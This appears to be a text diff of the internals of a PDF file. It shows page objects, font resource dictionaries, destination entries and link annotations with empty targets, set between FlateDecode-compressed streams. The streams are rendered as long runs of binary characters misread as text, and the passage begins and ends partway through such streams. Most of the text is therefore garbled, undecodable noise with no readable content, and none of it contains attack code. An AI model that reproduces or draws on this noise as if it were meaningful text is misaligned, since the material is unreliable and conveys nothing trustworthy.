¨H©.ãmÀ²;îu®ÛÎAó¹¤$¤Ö8á5>“¥Ôx×qx@‰¦ÑQc«_$0œœ”Æ5ƒÁT–Oe`…«ßd§÷{,¤¹éŽ•> endobj -658 0 obj << -/D [656 0 R /XYZ 72 793.935 null] ->> endobj -98 0 obj << -/D [656 0 R /XYZ 72 559.653 null] ->> endobj -655 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -661 0 obj << -/Length 1654 -/Filter /FlateDecode ->> -stream -xÚ­Wëo›Hÿî¿E'KaÍÂòŠÔ“Z]Úºj“´qu'¥Ñ ÃÚpµðHêÿþfwlâK.ù´fg~óLm©™Ú‡ÑíˆÂjjTó,Í LBƒ@‹Ö£ëS‹áþ“føÚ½¤ZkÌõa]iW£¯£w³Ñä½Eµ€®åj³ò°I`;Ú,Ö®u‡Œ ?`ú÷*\òñÍìÓä=uvè™ã“CImQA22´=Þ†"6˜M ZqÆ¥,Ð?êçcª‡ñØ°}¦çEæY%¶¾(ó5îB\¢<ûaÚlÙ”¡ ÃËéù7âÓj²©H5}p!eœ"¡eíÚq-¯Õ͈xŠÆ >ñ<)§5 °m=­p-ƆåëyU¥s$¯ê\¬L/ÂJ5/Õ~«6(µmTÛRÛnÕ¶[µOÔ‹ yð_áºhe¬]™KÜÀo•­nWë° ‘`OõÅ€æŽG«%'‚üj2bQ_YÃÅog»²F§½ yl€®æƒ<— y# †¶ÀবŽåèŦNP±¯ z{±Áð›\¶:-Ž$^ÀÕW@¯“ät½>eÖ >¸þó-0ûv>=ÿ n¾ƒŒ·KžÕJpX†k^óR™~¼ý~Œ"ÄšåêE¼ÉÂu -l£µ ;í§"øp6íèÇQˆ2Ùc2ÎÃè§Á³ ÿx÷åêümB*~Ù\}ýŒ×¿¿ÁÕ!&1‡r s xÝVi}ž×Âå„zÖ¸K¸nÆ"<„«*Ç]QæâÃ]«—yýä¶Ë¯+žH…õ:ðÅa•f2î}K¯EÔ&y%YzX*Žünì8 ² k®^Ý'<Ã]ÙdYš-ñ€ÁÒÙ̆,Wš¡<‘¥íØòt^Þ—iݦv¢68¨—Ï'˜ŒÒ â;¯Uš¦ÙÞÓ¢ÄJ¨ÌH|Ìw¢Rši”’ÀÌÄBg‹øîJ¹-ê,xò¿mxU¨J×YÂ+þ &’¶°Ì¡´þx€ï–7PKÒÅo©Ô=>hÉ@±ŒGuÿ­2P…%´ª×x ‹b•FÒ­Ö´¯m²NiBU{ù(Œ:N³Kl/@‰Fõx¨þSêŸuENäÞCy4 Žé´4y9Ī¢k·$—W³¡,¢%.íÛ{S5ŽQâ8nל ©K<Ø¡ u:é"zÄv·ÎˆÃ:ÄhºÄ„ÂÞ+ðï„k=¨3|6«è=Ø|œIkÃNYÜã…ŠAãªÂ¥\äåzÿy‰A+k€«‹:ÔǬÀ‚ä<ðYOê×ïÔ=AþóFA߈”SHƒ¢0ØáC$B7 ³¥R-­;ôCÁ6Ý6ÔG¼¥Ó}à1(‰,¶û…g¯>º[KwáUŽë6/áPA…ƒ‡uûªÌ›e2Ù…Ö°xAîôR^)Ññ¨~ÕDÂxÉ–,Ȉ«Ê«¡ŠóN'«­ªÖ@ŒÛˆÀKÑ–¤¨ïj[ÏFiö’®8®ÒŸBó¶2Ë®À4÷\ÉêpÐÄ4;ãlQ«Ù'€öXFŸDÓÃ*âó. .Ê0’¯`Šýë WjÂœ ³ý°Àƒ¶Ûà²ZÖÿkÄ2(ßyÂu ÙѲ5d%u]œN&Ô³u!Eõ¥ºM'ØP'¹ÔmRäUýwšÕ¤HŠ#ÅJ˜¨ò¢ŠÉ r÷ƒÚLZ9 ŒZýF+”žÆoè‘ò’ xŽÝŽWÓó÷ ñBE¸ÉÕ’ÒVe‘Xbº’9'/¤qß”«ãܓ䉡@^¶üÏÞ®zX†¤„:{B)Çž¡ÜÖ£"}€zw‚M㽡ùÀÜúÂňŸ–ëN>Ž »؃úÅ÷ÕÂ^AHÏÀ\ -ü¶þ 1môFôBáY³æeMšŒWQXðX©¸ ÅyŠÜ—¡Ùw÷K åóÓè0ˆµõ㣹G¹y©ÛT—y>—’×eÊï8ÌÌò¼‚Ë^ LÛ'ñOuŸÙ=Ÿ·%²¼kÛ󂋪.—60u¬»ÏiÖüR?ÿóäfµêt>¡¦êN¦cN³ºäEª¼7ó_pK‡B§ƒ°ó£Z ’,_åË~ùñ²ýó¶ˆ{‚To‹0j{Œº$xò=üU;†~0 œÍFÿÆR> endobj -662 0 obj << -/D [660 0 R /XYZ 72 793.935 null] ->> endobj -102 0 obj << -/D [660 0 R /XYZ 72 760.449 null] ->> endobj -106 0 obj << -/D [660 0 R /XYZ 72 551.908 null] ->> endobj -110 0 obj << -/D [660 0 R /XYZ 72 491.714 null] ->> endobj -659 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F26 513 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -666 0 obj << -/Length 1983 -/Filter /FlateDecode ->> -stream -xÚíÛrÛÆõ]_ñtb²#,Å⦌§“º–­L%6ýБ=™¸$Pƒ,$+_ßsöä8vݧ>{ÁÙs¿ízÎÎñœ—'7'>Œžã;1uâÔ#~š:Ùþäê½çl`ÿGÇ#,Mœ;µwX”ÀX:oN~=ùûúduN}'%iD#g½Õ8’¡³Þ8W‹,Ý$e‹·߉åûõ«s?Á³0!„ -šR9ñ kG¸]ì²€0–Z¡K×÷Yºxãb½„ß/š¥cÖ|²Ø’z^× -ÃÑ„J‚ – ¾í ã®ïE$fhH¨—hèËFuÕÍPg@=Œ,Z×ÍFô§ñI ôOgPEÄKâcLnߢô¥¨²z3‡7Aiƒ¦yµ™Áì§$ˆF¨7mݸˆùqŽ] -ª À’ë'$Žc}zÝÒ ‚`±\ö­Ð‹ŒW8a‹ë¥Kã…Ћ¾Û¾ÔE¥G¹¤Éân @µÞè2Qñ¶¨µ~G^â³± Œ¤ í¼Æ.ï>3Ñ Ì•¯sÃê2 ®5‡¼iÊ"ßâhb½×Š›¾h…“÷2ž‘E6@‹kÞ‰³QBÛóY­— ÖÎPj{£ÏÞ#ºº×‹œ£2nWF#}†«\ÞpÉɧTãj9] -¾˜¦_ š-“``G©‡k5ÒJŠNÓ×­QNeT >6e]˜Ïo~ýÉÚüß";¨Ì*h,_`cQÍo—a¸àe/:%1Èf÷bcöôÈ’M7åqgyÍÛºßåc× á Èêj3u?#uhË@Ö²óÕh¤»¢Ú}¾—~‰).U–x‹spÀmZú¨7¯ÅÅu«>Ýu¨7Ü(ë]aNÖfT<89ç͸Ýð¼(ñdœ.6ý¾‰õþÛ×?é †xBgÀ ™é°Ø´;Su^¿<ÑõQk7t3¾×Á"Ú€_Oôâ\é rAñQŠªf¿m\ Ÿ$‘±}/òº-~¯µºx©?b‚KÖ4Uo'Ç¢»ú{'JˆýÉD~«¿ÌæÄÔòªãÙhÁÔ‘â˜GtN±•zqÌ\„î€td -}Ú‹Mº®¥¬÷z#ÃtÇ?è¥2/̢Ѷ€¸2Ù1ôp¸Ò0zŒìÃ2D=èBÚ~þXá ad„He„S@íS«‰‡œjAH&‰Òè@±¹Ÿ¡G¡±‰} ¤2 àë8"Ò2ìèó(楌fê‰ÔŽ0h¢©ÆÛÆX‡·›oëÇ/k[¢RäÈ1ç=¨4…ÊfŶ79»»)÷¼ùD6~ñBºã Q>ÓEÐÞlñÏ"kë®ÖŽkKND{» èBUXƒÓx8cø½-2¡×¿ Hÿ4¬7g\?"A@ëòv'ä4‡?6ÿ‘“¦ˆé~(ñA$ˆyFø—¥ÒpÑÜË…Çywƒ -E­»©·×ã“\Êælµòc -‘@(8ˆ°¿Òj^í;˜¬tKö[QIÒä̓ÃÅ6EÇŒÚxçL™%%̧àmôk¸zRlžùöà­}mC¦L" }•çgûýY¿×W?Ÿ­K³Äº¯Ê. pV¶¦«5Ž¦¶ª ¥a=ïÛrÈ>#îþ ½bk6-~Ä©(bªÔ-ùu‰éw¼0´¹¶˜ï ¤*ûݧXJæY2DÃ#¢Lì³0Í -÷|d֛Ŗï…ÄÀ§Åæé”úæ¾â{È~^PÀ¶h÷2çò˜<|€÷Kx˜J;K‰ýDhÂÊHphI‘Œuã?âé+ÉWý^´E¶ê+Ñe¼Á‹ƒrÌLø83èÃ_Ëϱ忆¥YýÆŽ0˯µ'¿Æ”;„÷³×Ûq137ÊŸk9ôÿ\ÚÞÜÌö«õì#DÊH}Nc¥áÑÄѽçèÒw=/Ë{{mA-I{í¼ÆB~?-¸“kœ’ððæðý G Yjô¥ (d`†Ó™ -Î"lk tUË„~J’hñÀ!¶s-!TÒÃËÄw3¡“¢‡¦ aP;Ã0™>L\`ΨéSÙøž»úžo[lÜê°VÝkaSYWmÃõß^ê;ƒ/ç9:'Hà‘(ÞaÞé>êaHbNÝ»[šnK“¹+ÊÒì¡=çxEЮ[½åªO;ÓœA³ ÿ´í4ŽÑ¡ºUj.Ã0r…&Û¾µza4@ƒÑ5OA›q¾³÷“€$3}*ÂôHr÷Hæ$"Fr -’—]m8ÒÞ#è¬4˜‘ß*´~À[¶oJ?&à>UœÚ+g&ó‚…n«§“—Ó$€Iö2ü #¼!rÞy4´Op.æ–GŸàÀ¢Ø¤™sµz†´­8´ÓAJ§1ðÿ^ü«{qšØ^xû­“-á]ó7èAijoëí]–lWØš3i¨mÍy¬ ¦ÿãN{ ·~ýÐ;?¿x®7.ß®Í'ù83‘6‡ð勵i Î)ê€vå®4ÿaŒ¹ÔœA‰wñæÒM’0uýð´—[7ùþæ™GâÓ¿êqŽ©Wu§OÃ%ÇZ¯UħÉYâÍ1¤K^íz¾†¶¨Ü¾;•"Î:æ‹õɻڂ" -endstream -endobj -665 0 obj << -/Type /Page -/Contents 666 0 R -/Resources 664 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 654 0 R -/Annots [ 663 0 R ] ->> endobj -663 0 obj << +642 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 582.124 153.127 592.915] -/Subtype/Link/A<> +/Rect [282.367 75.143 314.586 85.934] +/Subtype/Link/A<> >> endobj -667 0 obj << -/D [665 0 R /XYZ 72 793.935 null] +646 0 obj << +/D [644 0 R /XYZ 71 806.89 null] >> endobj -114 0 obj << -/D [665 0 R /XYZ 72 760.449 null] +26 0 obj << +/D [644 0 R /XYZ 72 383.609 null] >> endobj -664 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F14 522 0 R /F26 513 0 R >> +30 0 obj << +/D [644 0 R /XYZ 72 322.343 null] +>> endobj +34 0 obj << +/D [644 0 R /XYZ 72 254.175 null] +>> endobj +643 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F14 615 0 R /F22 546 0 R /F27 638 0 R /F24 614 0 R /F20 501 0 R >> /ProcSet [ /PDF /Text ] >> endobj -670 0 obj << -/Length 1808 +656 0 obj << +/Length 2782 /Filter /FlateDecode >> stream -xÚÍXmoÛ8þž_! TîE´¨weQIš×Û&ÝÚÅÞ¢ Œ$ÇÚÊ’"ÑI³¿þf8”ìØJ›[°÷%"‡Ã™á¼<3Žmܶqºs·ÃákÜ#ŒmÆãØH;Ÿ¯m#ú…a3/ŽŒŵ0¼ ‚oaLv~Ý9œîŒOnÄ,œÀ˜ÎH†Ëb×7¦©ñÙôÙÈŠbÏüÔŠÛlt=½Ÿpßó#f{ Pq;.²ìØÚ4ðòZžë2`žÓƒ$Éj¹?²|Ç7eöMŽ¿-FÜ,öD]y"d^•@ÚØÏå¢øPsO]BÂÏwolÓ¾.D^*B´‡FAwÀ.©Íð q]ÞV|þÛ§6k,à,; Û;Ô¹õ$é‹íÛs)ëýñNስղI²YÕÜf ¸ËL’TU_óLË>˜|˜O&pãüêòüÝäàpúñè`òæìÃÑáéÕåÁåÅáéÉÅÉÙéÕ?ß½?:½X–Y‚NÒB“¢mÖ1;‹£€˜?3Æ®ŸHñôÁ|¾¿Xì{ö5 ù|~yR®ôvÙ´È[í)nŠlÈžmî‹TȬ•yy«ÕÌèKÞ¢u Ì¢‹Lf Q^iÿ=qÞ+<ózCÓÇR,òäEM?€Ž““ó#"\}šê£³éô­šìn –î <=ž“N‹ñm&Aà¿[Ù0ÑÖoÁ’ìM±”óî(vÌÙ`¢P™XÉ\4mFÉè™ç“++ŠüØâþÞRάH%r¸G É9«Ú.•yè00‡ƒQP˜N´ÙCÉ U¢¼]B)hÝYi-Û½¬|¾vþ¿+ûE•çñ߃ -/)âð™¼ýíà#0_ž_ž^”ÍvÍóp٬껬¤®`þN užÑ%”½v߈…®þs(jÏq#'2«%mê¦9¡yŸ§DI_UrJ²ã¬IæÜcQèw H¿tÛ×gAwlóL¤è|?ò}S`^.{•).*“(R@Ì€EýÓÇ_ˆÞ" äfÚ¾È\lj™k;“LZÏšìÌ ~b2%' Ì¡NÏãobQZLUjû´oÖG†‚¸ïû._Œ ]ÅûvdÞ l>Ò:ÍfbY &;6Sx Ô-"U[¾ÒD…`Èš• #Þ"šZÖ©ÂŒê44µ—Pgj÷€à;æÍRËì‘Å$*Y€ -í.Ñ¢sÍxƒŒÚÔΫ@F¯n#¦­AN?¹Kq¬n6ÚŸ¡g²8æ]Y±]_ÜBèPtD/¦7¹Q„F“dF$ÆgB3%Ä>ì†x¤º!Ò,)Dƒ¾Â]÷.\Ã@\¦¢Ié‚‚S Šrå#&ˆàîôlˆQ¥¯ÈW­UYñHÀ¯_õÄ%=F/„T}]íŒüåg7uWs–¤JŽ¹²ã>‡ … @3ÁuXȽîG¡Ë\ð?÷bó ã a;z!g¾vQPcÓdÞ‘z åq¾Ñ¤j#ÀúX >slÝþ®j••ûVx`…ßw æVßÐŒRhf÷Vã800x@#zK Û@¸Ü§ýðð‘<ß)nZ4«YSäê¾l<„:Z<×wi·úýÃö½ý.lŽ¢x+dCnòa¨ÚŠ—NCß_뤮2·ÞIu Ü°ÑcÃ3öÚ€ý¢yTÇ"ïüI(ѶùMñdNòÌ™øªêJ_б­Æ¦”ñà7LìüÕ<¬T‚ÓŒe9vÈìÀÑ©|oÔ*‡f­˜[µà«F$ê Ð¿ŽéËmæ0›ñad ]ï10q(ÌHÕñ¦;Ïÿ‹ÉåÝÀT©·©¹)/%«çõ[‹TþÂ]Où3fwžöíUxJ=±ì¾ÇaæE!ƳWY˜T‹PÒäg"¾Ÿœ“ˆ’¦ý–—iõ KýŸŸqLÑn~»'ª;èÍãéÎîë/b +xÚ½ZI“Û¶¾Ï¯Ð-T•Åp¸¼[œØ~NÙI왼ªWvIŒ)Q&ÁYþ}ºÑ nÃ;åå"‚X½~ÝT°Ø/‚Å‹‹!<ƒE¸H£Eš~˜ç‹ÍñâÝ_Áb ý¿._äÙâÆÎ:.D’Á³\\^¼¹xzuñãó(\ä~žDÉâjG{Ä~ËÅÕvñ΋üå*Ë…÷|™'žV¦­u³üëêן‡r°L$±D°¯]”ጋ€ \¬DœùacÃ"§Iªlªå*N2o«ß±8i|K=EµÞ·¥ªWúö G6Eu¢áµjô–¦4›ê¼\E™Ç+ÍA)z¶<Æø¬b«OKXbŠÝõÜŠ öèµZ†ÞŽšæ ©qVu·‘Ún‘Í'À¾pW¸ç*Œý$ÊènF7Æ1ø%üZa…¾Ì™!ïƒ0®ò˜–0‹¯–YìÁ)@p×;×Þá®·%ñŒ¤šd~¤ní‹gW3"Œ2?ë÷‡+«£6ºnžÌì'¥ŸˆÄÍýã÷˹ c釳û­D"¼ÿ^]ý1³s–ÁÎÒ­ú¥yÕ‡BÏgÝ­ZmuMì¸^J +ÖêOœ–CÓ­ÿ³ÑõÊ +s%BéçiÆ2eñü´ÍbÌ%0/H¦”Äb@ ½ªÓ–¹Ÿ¦!½Õ;]ÃV3ø©Ÿq¢U|qOñEÞÓ&VV…¡—Ë7¯xÁéo½1dw¸m[žt­˜Ca&ü0ŠÆZea +Ý€ËBx/qÇ8&cŒÐ¦íЫh€Œ·ã^ã¦i†G¶í  =Š›êxT«F£Jk–ÐY Wíh·vÞè`6ÔOš½IÁFý>¾4ÐiGÅ··äßÏÌä ¡Sƒ”hO»»©õE3ú+ü¼·€£º-Ž¨¢íÉÈ;ñ ü®­!YË#‰¬S?9_h¬ËâÄc¤›Ð7ÔMœ«Áƒ§ÞáTÀM>¢$[ÒÂ8'-Ä% =9ìÀnÄcP?\€+×¥¦‘)m,†žªÌ³¶¬…ß5Mªi†e-Lh40wˇN¢³àP•¬½¼…Áín––'ÒV­PííhêT6ÐŲùj:Ö®¡šV4ô|‰äQï¯{W=Ú*~gw5ãG_ÄmL J¬üÑ´g–Wmž IDÜwm‰Ã1qdN´²]È4½¦u>—ÅF‘Ê`ò¬@,c©Öœ{ìg 6€ÿ[vzAêGI2bË^̪¢‹"* õ›…ÆTµø"¼ƒÂ·ë%£nÚ†ÀÛVE­ª¦gáN@šÜ†o(½¿[ë¡eHÑm¨‡ôYZgF­Ûµ£®ð†&dž&ñ–3z< ´±‹E ½‹ŠÃþ°Å’ŒŽ\ر“MN6ùý>"¨’®†?wTþ|ûj¥OÌõ­ !ÖJa⇈0ÝgåúÛºóŸZSªQYÞ!UÀ`ré`ó$Ü\ä§lL2ëlìR›ÕƒvÀLDâsì,êílWWG¢”Œ'C{y‚,”`0+ÐÞ¸9U¦kq:¯ƒ ÍPÝÚK¥æ&~¿Ø‘õZUƒ'èÚ¡õÖ¢ƒµ4FÊI“X9á…‚e„‡ZK€f÷xs~²×ÈÐkhÞË°…ò‰ÿ+6Ý&è0êFYÿ’ Ì IW‘&ÒUh ¹¥†»Šý©ªõœ=ÞÍH7Ûãä©tGbCØFcé>®ÍÓâ,ûu¶*Ih­® ™Ó¦*gT/ ü<ïTï©jŠ 2äùK±‘òËoW¯^S‹¤› ïg]0Li騗}2"îÂÆ@°_eçU§¹4Jr?î¡óPôó(–ƒœ¾,6b²$n!é·w3”f‰/ÃYB1Y!ì‰IËY!6ÁÖš”Ƕ­­á´’Ùîj2lT½×†:GáÏÚT‡¬K­ê¼ ©7N¹)Ìì˜ée¸xåËüp(ÿĘƮ'¿=Ž®²ŸkÊ ÿ–>¤`ëæ{€nŒþ‚Âc$o§>p<¶½³ˆ *’ɧ¶³9Üå¾?ÃYC2ÚÙ…T¢Ù²ûare"‹ÿ ¹6 Æ\×̇—0ÿ=ÅàœÁp;¢ï¥fšVœ…à¯&Ë)?j`¾šÓ<~ÖÀêXv +T^qFÍj¥ËænM y¨}ÁƒËoŒ.GƇ +ðb§ dMÀ‚¤ mထ6…£T®j ÂÓ&óÒ+5âÝ€Ã6 îª5çÖPßb³Ú#šsŸaŠ•ÃŽðÿ€ˆl ¬fõ-¦Øó#ît¢a:N²æŽL?‘´$cج¹8P?ŒÇE%K )¿š°GqÞ6½pä‹4¶Pˆ"ÚÎëWÔhpœerûA*ÇÀKD’½6žè¼6t¶¥NkäØûîyâ$æàè ࢽ*NqûWæ,&e<¶±³Ú[ì4©|Là4^‹}wWÎcﳨŸJET²úömSÓਡêÞ(z„aM]‚þZŠh|F6˜£öa¹896 (G•¥5H +oä“~à) D=J†;9 +oÇÕóÇy +á'©ünt ‰¢Ö§î7üø]Ñ­LL¡Æqo:”‹"Ž F>aÜØ`hþ°ÒíÀЖœV~×bí4,A¡áá„ÆÔíƒ* )·ËÖsÍd'A⋬ûîgµTÒwgx”\ã°þÞ/ß¼*lIÚ1g)2nO>~¡A*¿ÓÇ¢Aüi©0¾¥Ê :óåQ'hι•RõÀn‹ùì²:uW3†y./œcv¶>tQíšCJ:˜ŠÞøÜ¡÷ +Qð¾«"îÍð/0ûå¤qåûfØ $͹T?íjxvô—§¯/ù ~BDU­]NJ™–~@b¾-;^’ õ¾÷Â}=F ruYôË+l6míR-šÄŸ YúMÕRµ“k[+Èé1ØÑß.è(õžÿ‰òöÅÅâûZÕPñvôŸw]±èÑå7±ÚÝ_8MÝóÙÕÅ?†&ë~ endstream endobj -669 0 obj << +655 0 obj << /Type /Page -/Contents 670 0 R -/Resources 668 0 R +/Contents 656 0 R +/Resources 654 0 R /MediaBox [0 0 595.276 841.89] -/Parent 654 0 R +/Parent 647 0 R +/Annots [ 648 0 R 649 0 R ] >> endobj -671 0 obj << -/D [669 0 R /XYZ 72 793.935 null] +648 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [342.73 148.679 390.982 159.47] +/Subtype/Link/A<> >> endobj -118 0 obj << -/D [669 0 R /XYZ 72 265.047 null] +649 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [411.677 148.679 433.866 159.47] +/Subtype/Link/A<> >> endobj -668 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> +657 0 obj << +/D [655 0 R /XYZ 71 806.89 null] +>> endobj +654 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F14 615 0 R /F22 546 0 R >> /ProcSet [ /PDF /Text ] >> endobj -674 0 obj << -/Length 1868 +662 0 obj << +/Length 3113 /Filter /FlateDecode >> stream -xÚÍXëOÛHÿÎ_aU'5ôâ×^¿¨ªSÛƒ–ª@ AwE'“l·~áµ é_³;k'!P„t÷iž×îÌüÆ–15,ãÃÎõ…Ñ2¨áÛ†Z„†¡1Jw..-c ûŸ ‹°00æŠ*5˜À˜g;_wÞ w65Bz¶g 'ÈÃ!¡ãñqÑsÉ®„¬w.¢)ß½~Pw…ž¹±0TÔ6“$;–V x{F´“´&sBGNc!ž¹ „\ÊcpĤ6èêè³Ù^šîYöå®éÚnïâðø`—öNô²â¢Š³).Fy–ñQç™þ˜Ë‘õª×Q9åÎë2y”¼áé[wppø7N·úÓÇáð ÎJ~]ƒ"{] ?ì‘h ®“4*éBÃëdªüg)fÅñø ]rPB»x½xQ™£YT -â”u‡g'f¸¡IÝ~]MÌàõõ‹øýW8vñù˜ <íö¨oꛂNò^î“›DÙ´† ó̬EŸgJŽ»vŽ­žÛk®ê¶ܦ 'éGE‘Ä£H^lÝYϪ4ùv²¯É %$Äu‘D1J ú]êÆ)(9(²iÿÕàU‡všì\ðÒʬÑð(ÿ 2ã$‰ŒX¸÷Ír­Qž ÛUÂ_k³Ã}ôO,½÷Wœó¹Àű¾s—P`ÐéÓ÷ícÕÒGIÒï|•MxÜ <Óf$´|=â‡:–¾”ù®ônⱊ ‡½é=œ}³–ð>²´í–!˜nûM,“A¯ÁS»&í¡·½e(uˆíÍѼԲ3©Í9Äb¹ªÎ!r%Q÷zWç$Zç|¢?èu£öS¦¡¦Š -2í[¿Wá+1mË'Žå‚kâÙÚ[2I8Ž£’Ħ7ì8Ko˜Q—Ùñý°µºWÚGžñ8ŸÃ»Â™re¯EÅ‚tŒÃàÞx Hu(B=x¡ÛˆQo÷­¼\—x”6¤“µ&ªIëz Šà&¸'±Vc¢nP’4šcÆS6`ÆD{Ös £6x6gx(xÿ6J‹D3•9yÕ¶ÕrãA!½FߣÅÙ×Ï@8>ñü }¬ =i}o­êlïV#ª®Þ„ NótÞú #²XT³¦–`ΆÛ$ÅwÌdzª*öƒ6“:h!“®$üŽlÿBsÚŠuÆ¡Ž* `.ºt%ÀD™Ë¸„-ÚkÃòÞ‡>*³Cà­6«)lîÃÁwçô"¯Š£$þÙ–Ó¶lBtNb)¥.UŠ¾¯n>ý,ŸËdÏÇS½smIƒAJÈZu±¢¾Ò]f÷æB‹¨ŒR^ñRtU®‡$Mx5šµ’JŒæ5TÀVcT}™ñh,³“:_6ôUr´á/Wïµ½Ô—òÅá±Ä)'« -òñ3è«»¹W¿NàÕ´£”¯mÕÔíym5=:;F%mâvØ0ØVWº9NÕæ\b9™”9ÄýxCÂsá%äÃtùIjL… Ç2¯§³'½Þ’GKÕ6Ð¥@‡äÏš[ʯ¾Ë¢ñYðúE+êï£Ï89e̵ ‰|•¿þðž‘o Åá)È{û¬ˆ\¯ÿ"WEäÙ¹³‘ƒœô¿Fäl+"‘? ‘oä·;‡°{rH6—yë°ùq^ÁËg…8gzK=ßDîæúC~ðn–¸¨Iè’w,´0ˆ -Yä<šÂ­ ­…]ŠRÂæï£J­ƒW‘'"×$´ç5.Æúc–kŽØ…HÎËy/ G7BtôbÎ:óIT'Õ&~Þ朸4|,nœ#yßìº.˜WsÒhøÒYG³gy*¡¬íõ˜"p -º)ó°4ÈHÓðòFšêˆx¬ŽäÎŒ«án)X #Bs˜l1Óvlâ{ì±vºN°a'0;=e§ÖUA˜L¢8YÓ£I¥r«äBš)›,° ‘²×o.V홋}k|;¬a”Ì~¬1¾Ý¶=òKêI)…ìu}Ùëò±lº˜í‹&Zµ–gù-Ú‘.#B~Þ•=Èã -zuyó#)ü‡ºhÍáªmv[OÌÕ÷+½·Ì«ªûÄõüuWÊþ¬äê\Û{5͘ˆS…È"½Ž±s.k7=VQr »¶n?‰„J A±Ã YT3ó£¨é»»W1SŸãªÍØÛ))ê?!™L•æâIZ›Le›¶ŽDììKdpzrzyÝÝE"Èž®È³q“çq5ÃY¤ñJÉæ$Ãz±D¢ŠªZ4gÌûZL¹è* „„$1jÉ›Ðs; g+ºáÝ=šK(®á¡††fW£Ý–$È&!ô¿]è¾!ÛSö>ʬ?Ý:sO‰ËÚ:tÊ'¼í6¥0‹0Û¾“:ê#¥¡ºSÛÒOÿ¤À²»)Þñ!@–¿bÌr©ÀÆãÙîü ‘X ” +xÚ½ZKsÜ6¾ëWÌÍT•!@ ·öb—ãÔ¦’J²ÖžœÔEB×3ä„àXž¿Ýè#ŽœM¼¾h@<F?¾n(ÞÜoâÍwW¿_Iø7rcÔƱE±©öWï‹75ô¿‰….òÍ£Ÿµßè,‡ßÝæÝÕ/W¯o®¾y«ä¦E¦²ÍÍÑHD‘¤››zó>Râz›:z{]d‘-‡coÝõo7ßóV¦³e:KD¬€®_TàŒ«˜„ôFJQ¤©Â¹[ž¼Õ‰Ðºû¨ë­”*Þ6í½í}Ó^'*®·‰I£²­©a¡WFǽíË¡éZê¼›16ÛVê‡R‹BëÍV%Â$š6ý5–æœÕ¹0°•„C}ûi°­k>"Wöz«ó,º-+üú°µÈžÎMT—Cy[:K_®»»–pàø'–=|òÑé?v”D#‹ŽmmûÝ Ä@ÝN‰sa1:t»“ìž–ü'¥¶ÅÓÃ[™ˆL±h'Q>½7eDQÈpDäå¬tt„MUs$Ô¯þžíŸß]mÞûi¶ï»žVì­såýÙ%ð´—ÏQA9¶­e2‡dgüß©ÜÛ +u¡î8Žµ«nt7gA%ÿì) ÃV +º"š«JúE¥ÈI®îX]Ãú¸,™G¥Ã_ýxz÷ËÔUup·û=(·2¨ò8Ü´ÿ±þ<`Ya¢„~Çdv®£¾*çšÛ¥®¡£Iw]_…®K}¨µ0?h­\h-ŒïËî +ü¬(Uо$I¢¶Ü[j5wø«£nЩ³Üõ¶¬Oôñ¡íæ#ÏÄs6»%ܪXæ²Í.4za³¯K×T´Õ#²do‰?gûþ»§A0Ô¿‘·²çÓÓ9_[»¤S}ƒ¥ n»]wÏ' 6éÍÿÏG}w<°ô¨ô:õ:€¿½úÆÒyyäo^ÿøŽ¼ÂÂïÉĈبÉ-xó|ê=-°ÅÓ^®PÊ„gËx¨óÑ­’Ì”H¤ +Ø2ÏÙ+„ÎÓ0§:ö½cE1Óæ§Ôs#²|ä§iÁ<ö%Û˜Îãè&e‡²Üy݇.#À4–&P•mPp´DlU¨?h;¾õan ‹ÕmèŽÍsLoíÌ3Ób”õd±I ê}Ó6n€˜Ø­ U‚Äd:Þç¯q¿yý +~äó:© +%Œ”_N+ÑT:úµÞ((Û•À²Òkç%‘­¡£D®?£ñ$DOæ‘<”ÎùÝõ5õ<”îaëH€©”ŸÛ&]ݦo>6;{¿JØÂŽnßíVI¦©0ï]$¹Õ:>—º佊õr!ÍçØÌGBë¼%JdiöYSO²‘TÕíŽûv•§X˜¼óž×j™‚wKþŠ¯}u:ôZL¶êîÛ&àÑ,êîè—”Êk¿‡¯&(•%çCmÆ·@……Á@ÌS¹¨BŠlÒäªg$ +nŒ Cèxl†ê+©£n<¦(ûaÅm ´¸þÑ· C ½ê­Nþ˜ØÁ8Mœ}1_¢c³.šTÍÇmì6À ,êí¹³|T,ÿááÌŠÙç…ˆµš»Í²"†Çc1ã²Ø¶»ãÛYôÂGÄ/£–9ö cà%=µJ¦Òv|=Z +™]â)¼8*« +Q»CM›` ôPÀ†C6bÃÒ#ElV¡“"¦~:¡»/é{(y+ÞàñÁ¶g[Í=uÌXrOÎþ³@²¦¨k9¶Ç a͆¢ä’)×0枀§0÷ܵf¼M»°%NròW_uù"ÎF÷’ŠøÄÎLä²øbú®Ì}×…HõèâëãÓEYÌ/¾.za)Áuêñl|SMow§k0ÿ—ÈAŽÞC™<êK@´Ä ú8ìâ€0u nà„'IvŽ††3KG<±§^4†÷Há|_ó–Tª/šú X9[ö>2óªõÃ"BOmÇ5£Éø +5ó8Ãœ{‰Þ!^›žŒ‘—–Uß9GýþòçôxNwaoÌú2£n>í sÞ;Ç^ÐÀe/–ºÈg±ÙÄIˆÍ*ŽÂ/Åæ—$â/¥ø,!Δm…ÑÚÏP\E)¢¦nñîDKF¡žDPòSÄÏò¸Gˆc¬W¾ˆPÍ‚WÕÛqðYä'f¡ ü1¤ðiæ£\q`ô¹1•cØ#ÍXcÝûòQïšT E3shyC6%î‘‚¤8_ðæ"€?\§àlÜú ÂŽÙƒ’:xœg_0/-.`IL+Æ„«?úÚ…¤›Ä}ú26@†P8Ãzâ‡Paí¼)ÁG{w¨j;>~Ñ7^ Å@ÓL5œ˜7…™Õ®±£Nh¯Ž-ý5Ã7…¸"}â©þÇ>2NDËŠ¥/ b!$X HÜï»}‰ö­3 ¾À ÚG%±wÌ0X7ÎÙ* º³ºÓ¡'° +†Åû èVuGtN:j 